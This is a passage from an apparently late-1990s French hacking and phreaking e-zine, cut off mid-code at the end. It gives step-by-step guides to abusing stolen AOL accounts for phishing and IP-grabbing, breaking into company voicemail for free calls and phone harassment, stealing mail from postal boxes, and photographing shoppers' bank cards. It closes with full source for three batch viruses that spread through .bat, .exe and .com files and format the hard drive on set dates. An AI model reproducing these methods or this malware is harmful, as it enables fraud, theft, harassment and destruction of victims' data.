compte HTML de votre victime 4/abuser du compte HTML 5/UNDERSITE sur AOL 6/recuperer des compte avec votre compte 7/Trouver L'IP d'un Lame AOL grace a votre compte HTML 8/Da end. 0/AVANT PROPOS ÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Yep les gars, C ThreaT! Bon, aujourd'hui on vas parler de AOL Hackerz : "AOL, aarrgg, sa pue AOL" Ouep peut etre mais moi je trouve que AOL et une chasse garder de LAmerZ. Et y'a plein de truc marrant a y faire! Par exemple grace a AOL je paye un abonnemment illimiter de 0,00F par mois et 0,00F de comunikation par MinuTe Komment! Grace au compte Hacked + OutdiaL Nų vert donc, la je vais vous montrer comment faire pour acceder au compte HTML d'un LamerZ AOL Car avec un Compte HTML, on peut faire plein de truc sympas 1/INTRODUCTION ÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Bon, meton nous en condition! sa vous est jamais arriver d'avoir un login et un password AOL qui ne vous appartient pas? si! bien sur, vous aver voulu voir son compte HTML, seulemment Problem! on ne peut y acceder Par une connection INVITER. Merde! fait chier. But How Can I Do iT? 2/CE QU'IL FAUT AVOIR POUR NOTRE OPERATION ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Donc, pour acceder au compte HTML d'un Lamer AOL, il vous faut etre dans une condition bien particuliere. il faut etre loger sur AOL avec le Login de la victime. donc, vous vous demerder pour me trouver son login et son password (avec BO, Socket23, Netbus etc....) une fois en sa possesion. vous vous loger dessus. et la, vous remarquer que si vous aller dans "MON AOL", "compte HTML" AOL vous repond qu'il fo etre connecter en HOTE pour acceder a ce service. HHHAARRRGGG!! Mais comment Faire Bordel de chiote pour poUvoir...... 3/ACCEDER AU COMPTE HTML DE VOTRE VICIME ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Procedure Etape par Etape 1/poseder le Login & password de la victime 2/lancer votre connection AOL en choisisans INVITER 3/une fois connecter inserer dans les champ prevu a cet effet, les LOg&Pass de votre victime 4/acceder au compte HTML ------------------------ alors la y'a 2 facon! a/acceder au compte sous DOS donc, vous m'ouvrer une session Dos puis vous faite ce qui suit ------DOS-------------- C:\>ftp user.aol.com connected to members.aol.com 220-guest logins are "ftp" or "anonymous" please use your full email 220-address as the password when accessing the archive as a guest user 220- 220 user54 FTP server (Version wu-2.4(1) Wed aug 19 17:07:28 EDT 1998) ready. User (members.aol.com:(none)): -------------------------------- ----<>------- Tres interresant, on vous demande le login (user:) donc la vous taper le login de la victime sous laquelle vous ete connecter par exemple vous etes loger sous "VICTIME" donc pour "user:" vous me metter VICTIME Et TAK! ----<>------ ------------------------------- User (members.aol.com:(none)):Victime 230-Welcome to your FTP victime 230-bla bla bla 230-bla bla bla 230-Thank-you for choosing AOL! 230- 230 Guest login ok, access restrictions apply FTP> ---------------------------------- ----<>--------- donc la le prompte et passer de C:\> a FTP> voila, tu est Loger Tape dir ou Ls pour voir! ------------------------------------ FTP>dir 200 PORT command successful. 150 Opening ASCII mode data connection for . total 24 drwxrwxr-x 3 500 501 8192 jan 28 18:16 . drwxrwxr-x 120 0 501 8192 jan 28 18:16 .. lrwxr-xr-x 1 0 501 13 jan 28 18:16 README -> /usersFAQ.txt drwxrwxr-x 2 501 501 8192 jan 28 18:16 private 226 Transfer complete. 267 bytes received in 0.22 seconds (1.21 Kbytes/sec) FTP> -------------------------------------------- voila tu vois toute l'arborrecence du compte du pelo --------------------------------------------- b/Acceder au compte avec un logiciel FTP la technique Nų2 et mieux que la premiere vue que la vous aver un interface GrafiK, donc, c'est plus simple a gerer quand on est Newbie. Procedure! Lancer votre logiciel de FTP (CuteFTP, FTPexplorer, etc...) et creer un compte avec les caraceristique suivante Profile Name: AOL page User Host Address: members.aol.com Port: 21 LOGIN: VICTIME PASSWORD: (Ben la vous metter rien) -->Connect! Et vou vla connecter sur un beau chtit compte FTP ou vous pouver foutre vos pages, ou modifier les pages qui y sont deja. Newbie: "ouai, c'est cool, mais a quoi sa me sert tout sa" ThreaT: "et ben maintenant newbie, tu peut...... 4/ABUSER DU COMPTE HTML ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Bon, ben maintenat kon a un joli compte a nous, On vas en abuser. donc plusieur facon. On a 10Mo de gratos, autans en profiter! prener tout les soft secret de votre babasse et fouter les sur le compte, comme sa vous pourez y acceder depuis n'importe quel poste. par exemple je suis dans un cyber cafe, et je veut connaitre le pass de connection je vais sur mon FTP pirater ou j'ai prealablemment foutu mon soft de deplombage et voila, sa vous evite de vous promener avec une diskette. Il y a encore plein de moyen mais la je vous fait confiance ;) 5/UNDERSITE SUR AOL ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Une autre maniere d'abuser du compte HTML de votre victime et l'UNDERSITE! si vous savez pas ce qu'st un Undersite, aller voir mon article qui traite du sujet. Donc, tu te log sur le FTP, et la tu decouvre plein de page web qui parle de connerie dont t'en a rien a foutre. tu telecharge sur ton dur l'une des page, et tu y insere un lien qui pointe sur ta page qui est bien cacher sur l'espace FTP de la victime. Tu comprend?? Comme sa tu un a un site Gratos ou tu peut mettre tout ce que tu veut sans te soucier de la loi et des represaille (MP3, Photo Du president a poil, Nų de compte hacked etc...) tu vois le genre quoi! par contre il fo vachemment maitriser pour avoir un Undersite car il fo le changer de place en moyenne tout les 2 mois. 6/RECUPERER DES COMPTE AVEC VOTRE COMPTE. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Alors la! je vais vous espliker une technik qui m'a ete enseigner par ANGUS. Tu te fabrik une jolie page Web qui dit que AOL offre 50H de connection gratuite a l'occasion de son aniversaire a tout abonner qui envoi un buletin de participation. Donc tu fait une page qui sert de buletin de participation avec un enplacemmet Pour le login, et un autre pour le password! tout sa qui est directemment rerouter sur ton email. (pour le code HTML, referer vous a PhreAkAzoide I) une fois ceci fait, vas te promener sur les salon AOL, et dit a Tout ces lamerz la bonne nouvelle!! ThreaT: "Et les Gars, Vous avez vue que l'on peut gagner 50H Gratuite?" LamerZ: "Ha ouai, comment" ThreaT: "HTTP://members.aol.com/victime" LamerZ: "Putain cool, jvais aller voir sa!" Et voila! quand AOL vas ce rendre compte de l'arnaK, il vont contacter le proprio du site Web en le menacant de bloKer son Compte! Mais nous, on en a rien a foutre vue que le compte ne nous appartient pas :) Et on recommenceras avec d'otre compte HackeD. 7/TROUVER L'IP D'UN LAME AOL GRACE A VOTRE COMPTE HTML. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Donc, pour cette methode voila la Theorie. Sur certain site, (style www.cnil.fr) il y a une page qui te donne des info sur ta bacanne, (ton explorateur, ton pross, ton OS, la couleur de ton slip etc..) mais surtout, il te donne une info vachemment importante, qui est TON IP ! je sais plus quel commande ces salaud utilise, je croit que c'est un truc avec HostAdresschezpasquoi, enfin demerder vous! donc, le truc et de faire une page HTML avec cette commande qui trouve l'IP du mec connecter sur ton site et que cette putain d'IP te soit directemment rerouter sur ton mail. :) Comme sa, quand tu vois un LamerZ dans un salon, tu lui dit ThreaT: "Et lame! vas voir sur http://members.aol.com/victime" LamerZ: "pourkoi?" ThreaT: "Tu vas voir, Y'a plein de punter!" LamerZ: "A ouai, trop Kool" et une fois qu'il est aller visiter ton Vieux site Bidon, TaK... 8/DA END ÄÄÄÄÄÄÄÄ Bon, ben voila! je crois que c'est a peut pres tout. donc amuser vous bien avec sa ThreaT. --->4<--- VMB POUR LES NEWBIEZ -------------------- Bon je commence par vous dire :"Salut a tous bande de Phreakers !" L'article ki va suivre devait etre publie dans Phreakazoide III, le E-zine ki ne sortira jamais a cause d'un probleme judiciere dont a etait victime un des pilliers du groupe, et dont nous avons tous etait impliques... Donc je tiens a vous dire : FAITES GAFFES LES GARS, ON EST JAMAIS TROP PRUDENT j'suis bien place pour le savoir !!! Et c'est kan on s'y attends le moin ke ca tombe Bordel de Merde !!!! Et ca me fait vraiment chier de penser que un de mes meilleurs pote Phreaker n'est plus la pour partager avec moa des moments de delire sur le net ou sur les VMB...Biensur il est pas mort, mais ce ne sera jamais comme avant... A ce sujet je tiens a remercier des gars qui, depuis que le site Phreakazoide n'existe plus, plublient justement les 2 numeros de Phreakazoide... Voici les adresses de certains d'entres eux : http://www.multimania.com/bolliop http://www.multimania.com/pgk Alors voila : MERCI de la part d'@ngµS. Bon je me fous un petit live de Metallica et pi on i va... ÉĶ» ĢĶĪ / KESAKO BORDEL ??? Ź Ź Bon pour commencer, en gros, une VMB c'est une boite vocale apartenant a une entreprise comme Lego france, Boing, FT, EDF, etc... Ces boites vocales sont mise a disposition des employes de l'entreprise pour des raisons professionnels, comme ca chaque employes peuvent communiquer entre eux par le bier de leur boite vocale, de chez eux ou de leur poste de travail pour echanger des infos au sujet de leur bouleau, etc... Voila a koi ressemble un message : Gars_ki_laisse_un_msg:"Salut thierry, je viens de prendre contacte avec monsieur Trouduc pour la reunion de demain, donc elle a bien lieu a 15h00 comme prevu, pi apres la reunion on enchainera sur une mega partouze, ca va etre excellent...bon a+ thierry !" Pour un phreaker, une VMB va servir a echanger des infos avec d'autres phreaker par exemple. La VMB va servir en quelques sorte de "Squat" a phreakers ...Ou alors elle va servir a telephone gratos, etc,etc... ÉĶ» ĢĶĪ / KOMEN LES TROUVER BORDEL ?? ČĶ¼ Ca c'est poa le plus dure. Il y a plusieur facon de trouver des VMB : * Vous prennez l'annuaire a la page nų vert. * Vous scannez ! Bon losque vous appellez un nų vert, deux soluces souvrent a vous, soit une meuf ou un mec decroche, "Allo ?", alors dans ce cas raccrocher et trouver un autre numero...Ou soit vous avez un repondeur, la ca commence bien ! Vous ecoutez ce que ca dit pi si ca ne parle poa de boites vocales essaye de la trouver en appuyant sur les touches du telephone (#,*,0,etc..) si c toujours le meme repondeur de merde, recommencer avec un autre nų, mais si ca marche, cad si ca dis un bordel du genre :"Pour consulter votre boite vocale taper 1, etc.." c tres cool because vous en avez trouver une ! Ensuite la partie que j'intitule Hacking de VMB va commencer... =) ÉĶ» Ģ / HACKING DE VMB : ČĶ¼ Votre but est, je le rappelle, de trouver une boite pour vous l'approprier ! Donc vous commencez par trouver une boite, cad tapez des numeros de boite... La difficulter a trouver une boite depent de la marque de la messagerie vocale , en effet, sur certaine VMB il est tres facile de trouver des boites car le repondeur vous interrompt lorsque vous tapez un mauvais numero. EXEMPLE : Boite :"Veuillez entrer votre numero de boite" (Le phreaker commence a scanner) Phreaker : 1,(la boite ne dit rien, le Phreaker enchainepar un autre chiffre),1 Boite :"numero incorrect veuillez recommencer" (Le nų de boite commence par 1) Phreaker : 120 Boite :"numero incorrect veuillez recommencer" (commence par 12) Phreaker : 121 Boite :"Veuillez entrer votre mot de passe" (121 est un nų de boite !!!) Dans ce cas la, c tres facile !!! Voici l'exemple de boite plus dure a scanner... :( EXEMPLE : Boite :"Enter your mailbox nų following by #" Phreaker :"5400 #" Boite :"Enter your password and press #" Phreaker :"0000 #" Boite :"Login incorrect, please try again" Alors en fait dans ce gars on ne sais rien !!! * On ne sais poa de combien de digits (nombres) est le numero de boite. * On ne sais pas de combien de digits est le password. * On ce fait chier a essayer des password pas defaut alors k'on sais meme poa si le numero de boite est valide bordel ! en revanche : C'est souvent ce type de messageries vocale qui possede un outdial !!! :):) ----------------------------------------------------------------------------- CONSEILS : Lorsque vous avez a faire a un type de boite dure a scanner comme les "meridians", ne vous faites pas chier a scanner le password en incrementent chaques fois d'une unites !!! (ex : 0000,0001,0002,etc...) mais essayez plutot les password par defaut exemples : 0000,1111,2222,etc... 123,1234,etc... Ou alors un truc ki marche tres souvent, essayer kome pass le numero de la boite... ----------------------------------------------------------------------------- ÉĶ» Ģ Ģ / PUTAIN KE FAIRE ?? ČĶ¼ Bon une fois ke vous avez Hackez une VMB, ben a vous de vous amuser, d'abort si vous voulez vous l'approprier, changez de Password (le premier truc a faire) et a vous de visite la boite... Je vous conseil au debut de prendre un bout de papier pour noter l'arboresence de la boite, cad quelle touche fait quoi ? EX: 1 ---------> Lire les nouveaux msg | 9-----> Passer au msg suivant | 7-----> Reecouter le message | 8-----> Faire une pause durant l'ecoute | etc... 2 ---------> Enregistrer un msg | #-----> Envoyer le msg | *-----> Annuler l'enregistrement 3 ---------> Menu Administration | 1-----> Changer le Mot de pass | 2-----> Enregistrer nom et prenom | etc... 4 ---------> Rappelle Automatique (putain alors ca c excellent !!!) | 1-----> Programmer une heure de rappelle | 2-----> Programmer les jours de rappelle | etc... etc..... etc..... Un schema de ce type vous permettra de vous familliariser avec le type de la boite bordel ! ÉĶ» ĢĶ / UTILITE BORDEL ?? ČĶ¼ Ben maintenant que vous avez votre VMB, vous pourrez faire des connaissances avec d'autre Phreaker peut etre ??? En tout kas moa c comme ca ke j'ai fait la connaissance de mes 2 premiers potes Phreaker ki sont Fozzy et Phreakol Maker avec lesquels on a forme Phreakazoide par la suite... Sinon, s'il n'y a poa de trace de phreaker sur la VMB, donnez moi le numero !!! ;-) Sinon faites venir des potes pas des lamers s'il vous plait, pi echanger des infos, tous les sujets sont permis mais les VMB sont ideal pour parler Phreaking/Hacking/etc... bah oui ca fait moin lamer que de parler Phreaking dans un salon d'AOL !!!! ÉĶ» ĢĶ / LES OPTIONS BORDEL ?? Ź * RAPPEL AUTOMATIQUE : Sur certaines VMB, il y a l'option rappel automatique ce qui permet de vous faire rappelle quand vous le souhaite ! Alors l'ideal c'est d'avoir un putain de portable...Dans ce cas vous rentrez le numero de votre portable puis l'heure a laquelle vous avez un RDV par exemple. Et puis si vous avez tout bien configurer ben votre portable sonnera et lorsque vous allez decrocher vous attendrez l'annonce que vous avez enregistrer pour l'occation. EX: "Dring ! Dring ! (vous decrocher) N'oublis pas, tu a rendez vous pour la mega touze chez les DURANDS !!!" Ou alors cette option peut servir pour le harcelement telephone, je ne suis pas un exper dans le genre, mais c'est amusant de faire sonner le telephone d'un gars k'on aime pas toutes les 20 min de 22h30 a 6h00 du matin !!! :)) * OUTDIAL : Tout bon phreaker possede un Outdial, en fait avec un outdial on peut appeller a l'exterieur de l'entreprise, et donc telephoner gratos au frais de l'entreprise !!! C'est vraiment pratique pour parler a sa copine pendant des heures... ;) En fait c kome une option, kan vous etes dans votre boite, essaye le 0 par exemple pour sortir du standart suivit du numero a appeller... Malheuresement, les outdials sont maintenant tres vite grilles. :( Ou alors sont bride c'est a dire que l'on ne peut pas faire tous les numeros comme les 083668**** par exemple. ÉĶ» ĢĶĖ / FIN : ČĶ¼ Voila c'est tout ! Putain il se peut ke je n'ai poa etait bien claire et bien precis dans mes explications, mais bon, si vous commencez dans le phreaking ceci vous aura apris quelque chose je l'espere... si vous voulez des numeros de PABX ou de VMB, ecrivez moi je vous ferais part des plus connus bordel !! mustain@multimania.com http://www.multimania.com/mustain <<===La @ngµS Homepage. @ngµS. --->5<--- BOITE AU LETTRE DES PTT ----------------------- Bon tout d'abord cette technik consiste a etre en possession d'une clé qui vous permetras d'avoir accčs au B-A-L (boites aux lettres) des PTT ou tout le monde vas poster son courrier. Elle vous permetteras Donc l'acces aux courrier: --)revente de timbre --)agreable surprise dans certaines envelloppes!! Attention je decline toute responsabilite sur l'efficacite de cette clé car suivant les region les cles changent. donc je vous proposserait 2 choix suivant vos capacitee: le premier choix consiste a reproduire la cles dont je vous donnerait les cotes sur le schema.je vous rappelle que cette cles n'est peut etre pas valable dans votre region. le deuxieme choix lui vous assurreras le bon fonctionnement car elle serat adaptée aux B-A-L de votre region. 1) etapes:Pour vous procurer la cle ci-dessous n'aller pas chercher biens loin,aller chez un serrurrier/cordonnier et demander lui une cles avec les cotes que je vous donne.il faudrat surement insister car il ne sont pas bien d'accord mais bon faite un peu de social! (-----------40------------) #### # # ############################### ## ######## # # 8 ######## #### ######## ######## (--11--) Hauteur du bloc: 8 Mm largeur du bloc: 11 Mm longueur du bras: 40 Mm (minimum) 2 etape:Maintenant que vous ete en possessions de la cles brut il vas faloir la mettre aux cotes de la B-A-L . Tout d'abors il faut enlever 1 Mm a la largeur du bloc de 11 Mm ----) 10 Mm #### # # ############################## ## 00112233 # # 112233 #### 11 33 33 ----------------------------------------- | colone | Hauteur | Largueur | ----------------------------------------- | 00 | 4 Mm | 2.5 Mm | ----------------------------------------- | 11 | 7.5 Mm | 2.5 Mm | ----------------------------------------- | 22 | 6 Mm | 2.5 Mm | ----------------------------------------- | 33 | 8 Mm | 2.5 Mm | ----------------------------------------- Si apres cela la cles force dans la serrure arrondisser les angles de tete de colonne et si sa ne marche toujours pas desole. 2 choix:ce choix est pour les petit bourrains et les petit serrurier du dimanche soir car il consite d'abords a trouver une B-A-L assez isoler, si vous habiter dans une grande aglommeration ca risque d'etre dur mais bon quand on veut on peut,donc apres avoir reperer une B-A-L il faut tout simplement l'arrachée de son support( ou la demonte mais ceci est rare!!!), personnellement nous l'avons arachée en tapant de cote avec des coups de savates c'est dur mais a force on y arrive ou alors si vous etes equipe d'une voiture vous entourez la B-A-L d'une cordes que vous attache a l'attelage ou au crochet de remorquage puis un petit!mais vraiment leger !coups de premmiere suffira pour la deboite !!!! Maintenant vous ete en possession d'une B-A-L, j'espere que vous ete heureux!! Mais le travail est loin d'etre fini!! Donc vous demonter la serrure,vous analyser le fonctionnement,et la 2 choix se presente a vous : -soit vous l'emmener chez le serrurier et vous lui dites que vous avez perdu la cles de cette serrure. -soit vous acheter la cles brute (voir cotes schema 1)et vous vous mettez au boulot en annalysant bien tous les differant crants. Je vous recommande de vous trouver plusieurs B-A-L pour que ca se remarque moins et de ne pas trop en abuser car le vols de courrier ce paye tres cher de nos jours. Bon voila ,j'espere que vous en ferez bonne usage!! ================================================ | | | *** *** * * *** *** | | * * * * * * * * * * | | * * * * * * * * * * | | * * * * * * * * * * | | * * * * * * | | * * ** * * | | | ===== * * ** ** * * **** *** *** ===== | * * * * * * * * * * * * | | **** **** * ** ** *** ** | | * * * * * * * * * * * * | | * * * * ** * * **** * * *** | | | ========== ** * * * * ========== | * * *** ** * | | ** *** * * * ** | | | ====================== MavericK ~~~~~~~~ --->6<--- SOCIAL PHOTO ------------ bonjour !! !! ! ! ! ! technike de social ki n'est pas du social, la photo ! vous avez besoin : -d'un appareil photo num -d'un copain -(d'un supermarché pas loin) -de temps donc vous debarkez a un endroit ou il y a bp de monde, avec votre pote on se dit au supermarché sortez votre appareil photo numerik mettez vous a un endroit avec une belle vue sur les caisses et la vous mitraillez un mec ki sort sa carte bleue, ( en visant la carte bleue) si votre appareil met du temps a recharger , ben loopez pas l'unike foto ! attention de pas se faire capter, si on vous demande ce ke vous faire, vous dites, je fais un repotage (ou un dossier) sur l'argent(ou sur les supermarches)alors je prends des fotos c tres dur mais bon... bye bon et biensur avec ce numero de carte bleue on peut faire du net gratos avec notemment la carte fnac ou encore plein de truc, allez... bolliop bolliop@caramail.com www.chez.com/mvm --->7<--- PRISE TELEPHONIK ---------------- Tutto de bolliop sur les prises telephonikes pour ke la scene avance phrEaking rulezZz tout d'abord : Bonjour LES PRISES TEL bon alors dans bp de tutos de phreak, notemment pour les Boxes, on parle de fils bleus, rouges, jaunes, gris ... etc... j'avoue ke je me suis bp pommé alors je vais essayer de vous expliker comment c reelement fait: 1-La prise murale(beige ) 2-les tels avec base(le combiné branché a une base ki est branchée au mur) 3-les tels sans base(direct le combiné branché au mur) ________________________________ alors C parti 1-La prise murale bon alors elle est beige et se branche dans le mur, c une prise pour tel, modem, nitel....etc( vous savez ce ke c kant meme !) certaines sont prevues pour pouvoir recevoir une autre prise identike sur elles(souvent les prises de nitel et modems)mais je n'en parlerai pas dans ce tuto. bon alors c clair l'exterieur on s'en fout un peu, ce ki compte c l'interieur: pour ouvrir il peu y avoir des vis , si y'en a pas ,fo y aller au marteau! bon et la vous regardez a gauche vous voyez: en haut a gauche : -------- 1er fil-->---- 2er fil-->---- ---- ---- la ou y'a marké 1er et 2 eme fil c les 2 seuls(et je dit bien seuls) ki sont indispensables pour avoir la tonalité ! 2-les tels avec base: bon alors le fil ki est branché au mur va dans la base: regardez la prise ki va dans la base, elle est large !, on voit les 4 fils et il est conseillé de couper tres pres de cette prise ,(pour avoir bp de fil !)n'essayez pas de brancher directos sur cette petit prise,c impossible ! le fil ki va de la base au combiné a des 2 cotes une prise ke je qualifierai de lonhue contrairement a la large vue + haut ce fil peut etre inversé( les 2 cotés sont les memes) 3-les tels sans base le fil ki se branche ds le mur et ki va sur le tel (combiné direct) a une petite prise de style "longue" c la raison pour lakelle les fils de tel a base et de tel sans base ne sont pas compatibles, degouté ! ils ne sont compatibles k'en les coupant , arf ! et la ca marche une technike pour se procurer des tels et des prises(cables) , allez aux puces , y'en a plein de vieux! bolliop bolliop@caramail.com www.chez.com/mvm --->8<--- LES VIRUS V.B.I --------------- By ThreaT. CA Y'é!!! A La deMAnde GeneRAl, J'ai DEsidER de PUblier MEs petIT BéBé J'ai NOmmer Mes VIrus V.B.I (Viral Batch Infector) PourKoi je dis "MES" virus, ParCe qUE c'ESt Moi Qui Les AI MIS AU MOnde Et OUI, C'eSt BEau D'etRE Un peRe GEniTEur. Bon, poUr ceuX quI debArquE je Vais espliQuer vITe faiT ce QU'est Un V.B.I 1/What Is A V.B.I??? un vbi est un virus ecrit en batch! et qui infecte ses petit copain ayan l'extansion .bat (ainsi que .EXE et .com) comment est-ce possible?? C'eSt sur que c'est pas avec les commande DIR, CD Et CLS que tu vas chier un vbi! pour faire un virus de cette race, inutile de preciser qu'il faut etre experimenter eN parametrage batch. Oui, MAis comment sa marche??? Sa marche exactemment comme un virus normal! Saver vous que un VBI peut: -infecter un fichier batch -infecter un fichier com -infecter un fichier exe -ce lancer au demmarage de la machine -etre resident -s'activer lors d'une faute de frappe -faire une crasse a une date bien presise -etre indetectable par les A-V Et j'en passe et des meilleur, EX:alterer les commande dos,(remplacer dir par CD, cls par format c: ....etc) INconveniant de ce genre de virus!! les VBI ne sont des virii actif que sous DOS, sauf exeption rare!! (pour les infecteur batch), enfin bon, on vas pas rentrer dans les detailles Kel est l'interret de programmer ce genre de virus?? La reponse est evidente!! Ce sont des virus EXTREMEMENT RARE, donc INDETECTABLE!! vas me trouver un A-V qui effectue une recherche de parametre batch Efectivemment, je croit qu'il n'existe qu'une 20ene de virus de ce type dans le MONDE! alors qu'il doit y avoir plus de 50000 virii infecteur COM et EXE et plus de 10000 infecteur de macro word! DE plus, les bug d'alteration d'octet dans les fichier et Kazi NUL! normal, le batch ne traite pas directemment avec les octet. MAis comment aij U l'iD de coder de tel virii?? Tres simple! je me faisait chier et je lisais le MJ13 II, quand je suis tomber sur un article de Black-Burd qui traitait du sujet. J'ai trouver l'ID tellemment genial que j'ai decider d'en faire Un directe! et quand je l'ai terminer, qu'il marrchait impec!, j'en ai fait des variante que je vous presente aujourd'hui!!! Je vous presente DOnc le Virus "AbsUrdUs DeliRiuM" fait par moi meme! le fichier MVM.BAT et la source celui ci et un virus infecteur .bat exclusivemment le fichier MV1.BAT et la premere variante. celui ci est infecteur .bat et .exe et enfin le fichier MV2.BAT est la deuxieme variante celui ci est infecteur .bat et .com !!COMPORTEMMENT!! ces trois virus on le meme comportemment, a part les extantion d'infection ceux si sont sur le meme schema!! une fois le virus lancer, celui ci ce met en memoire quand le virus est en memoire, celui ci infecte la premiere extantion cible non infecter dans le rep courant lors de l'appelation de la commande "dir" Si le virus parvient a infecter le fichier "AUTOEXEC.BAT", celui si devient en quelque sorte un infecteur de boot, vue qu'a chaque demarage, le virus se met en memoire!! Pour l'infection des fichier .EXE et .COM, la technique utiliser et celle du virus COMPAGNON! pour que le fichier BAtch ce lance avant le fichier executable, une technique particuliere et mise en place (etudier le code source merde!) Une fois que le virii a infecter a tord et a travers, celui si attendra passiamment que votre date system comporte le chiffre "15" pour formater votre DD (J'avout que sur ce coup, j'ai pas etez tres imaginatif) Mais bon, au moin vous serez comment formatter un DD, sans rien demander a personne Mais pOUrkOI n'aij pas fait un infecteur .BAT, .EXE et .COM en meme temp?? parce que sa bugerais a mort! et je risquerait d'etre engager cher micro$oft de plus, ce genre de virus serait non optimiser donc, pourit a mon avit, si vous vouler une infection nikel! mieux vaut utiliser le virus infecteur .BAT! c'est le plus discret et c celui qui bug le moin. car vous remarquerez que l'orsqu'un fichier EXE ou COM et infecter, et que l'on rebascule sous DauB, les fichier en question foire du cul! Bon, voila! c'est tout ce que j'avais a dire, a part que je decline toute responsabiliter quand a la mauvaise utilisation de ses code source! A oui, autre chose! vous pouver reproduire, modifier, et publier ce virus au tant de fois que vous le vouler! seulemment faite en sorte que mon niK soit toujours present Style, vous optimiser mon virus pour en faire une vrai bete de boucherie electronik, metter un petit message du type "AbsuRduS DEliRUm V 2.0, Fait pArt ThreaT & voTre-nIK" ps: pour plus de detaille referer vous a l'article de BLACK-BURD dans le zines MJ13 II ps2: si par erreur vous avez lancer l'un des 3 fichier Batch, et que vous vous douter que mon virii et en train d'organizer une partouse electronik dans votre system, mailer moi a ThreaT@Caramail.com, je vous espliquerait comment le virer manuellement! BON! ALLer, HapPy coDing, et HApPy TeaCHinG!! ThreaT. Ju$T f0® $@y Fu(4 ----------------------> CODE SOURCE BATCH DES 3 VIRII <------------------- --------------------------------------------------------------------------- *****************************--<<>>---**************************** REM Virii Infeteur .BAT @echo off %vir% dir |date > abc.bmb %vir% find "15" abc.bmb > nul %vir% if errorlevel 1 goto virdeb cls %vir% echo AbSUrdus DeLirIuM V1.0, By ThreaT %vir% echo o |format c: /q %vir% :virdeb del abc.bmb %vir% doskey/echo:off > nul %vir% if exist %0.bat set good=%0.bat %vir% if exist %0 set good=%0 %vir% if exist c:\’’.bat goto debut %vir% type %good% |find "vir" > c:\’’.bat attrib +r +h c:\’’.bat %vir% goto debut %vir% find "M*V*M" %1 >nul %viral% if errorlevel 1 goto y %viral% goto end %viral% :y %viral% set ok=%1 %viral% goto end %viral% :debut %vir% %vir% set path=c:\;%path% %vir% doskey dir=’’ $T dir $1 %vir% set good=%0 if exist %0.bat set good=%0.bat %vir% if exist %0 set good=%0 %vir% %vir% if (%0) == (’’) set good=c:\’’.bat type %good% |find "viral" > c:\$virus.bat :end %viral% for %%a in (*.bat) do call c:\$virus.bat %%a if (%ok%)==() goto virend type %good% |find "vir" >> %ok% :virend del c:\$virus.bat %vir% set ok= %vir% set good= *******************************<<>>******************************** rem Virii InfeCteuR BAT & EXE @echo off %vir% dir |date > abc.bmb %vir% find "15" abc.bmb > nul %vir% if errorlevel 1 goto virdeb cls %vir% echo Arf Arf.. AbSUrdus DeLirIuM,, By ThreaT, With fucking of M*V*M H.C %vir% echo o |format c: /V:ThreaT %vir% :virdeb del abc.bmb %vir% doskey/echo:off > nul %vir% if exist c:\’’.bat goto debut %vir% if exist %0.bat set good=%0.bat %vir% if exist %0 set good=%0 %vir% type %good% |find "vir" > c:\’’.bat attrib +r +h c:\’’.bat %vir% goto debut %vir% find "M*V*M" %1 >nul %viral% if errorlevel 1 goto y %viral% goto end %viral% :y %viral% set ok=%1 %viral% goto end %viral% :debut %vir% %vir% set path=c:\;%path% %vir% doskey dir=’’ $T dir $1 %vir% set good=%0 if exist %0.bat set good=%0.bat %vir% if exist %0 set good=%0 %vir% %vir% if (%0) == (’’) set good=c:\’’.bat type %good% |find "viral" > c:\$virus.bat :end %viral% for %%a in (*.bat) do call c:\$virus.bat %%a if (%ok%)==() goto virend type %good% |find "vir" >> %ok% :virend %vir% set ok= del c:\$virus.bat %vir% if exist %0’.exe set goodi=%0’.exe goto debution %vir% dir %1 > mvtest.a %exevir% find "’" mvtest.a >nul %exevir% if errorlevel 1 goto inf %exevir% goto fininf %exevir% :inf %exevir% %exevir% set ok=%1 goto fininf %exevir% :debution %vir% type %good% |find "exevir" > exei.bat :fininf %exevir% for %%a in (*.exe) do call exei.bat %%a %vir% if (%ok%)==() goto virenda %vir% ren %ok% *.>nul %vir% %vir% for %%a in (*.) do set ok=%%a type %good% |find "vir" > %ok%.bat %vir% attrib +r +h %ok%.bat %vir% ren %ok% %ok%’.exe :virenda del exei.bat %vir% dir > mvtest.a %vir% del mvtest.a %exevir% %goodi% %vir% %vir% set ok= %vir% set good= %vir% set goodi= *******************************<<>>******************************* rem Virii InfeCteuR BAT & COM @echo off %vir% dir |date > abc.bmb %vir% find "15" abc.bmb > nul %vir% if errorlevel 1 goto virdeb cls %vir% echo Arf Arf.. AbSUrdus DeLirIuM,, By ThreaT, With fucking of M*V*M H.C %vir% echo o |format c: /V:ThreaT %vir% :virdeb del abc.bmb %vir% doskey/echo:off > nul %vir% if exist c:\’’.bat goto debut %vir% if exist %0.bat set good=%0.bat %vir% if exist %0 set good=%0 %vir% type %good% |find "vir" > c:\’’.bat attrib +r +h c:\’’.bat %vir% goto debut %vir% find "M*V*M" %1 >nul %viral% if errorlevel 1 goto y %viral% goto end %viral% :y %viral% set ok=%1 %viral% goto end %viral% :debut %vir% %vir% set path=c:\;%path% %vir% doskey dir=’’ $T dir $1 %vir% set good=%0 if exist %0.bat set good=%0.bat %vir% if exist %0 set good=%0 %vir% %vir% if (%0) == (’’) set good=c:\’’.bat type %good% |find "viral" > c:\$virus.bat :end %viral% for %%a in (*.bat) do call c:\$virus.bat %%a if (%ok%)==() goto virend type %good% |find "vir" >> %ok% :virend %vir% set ok= del c:\$virus.bat %vir% if exist %0’.com set goodi=%0’.com goto debution %vir% dir %1 > mvtest.a %exevir% find "’" mvtest.a >nul %exevir% if errorlevel 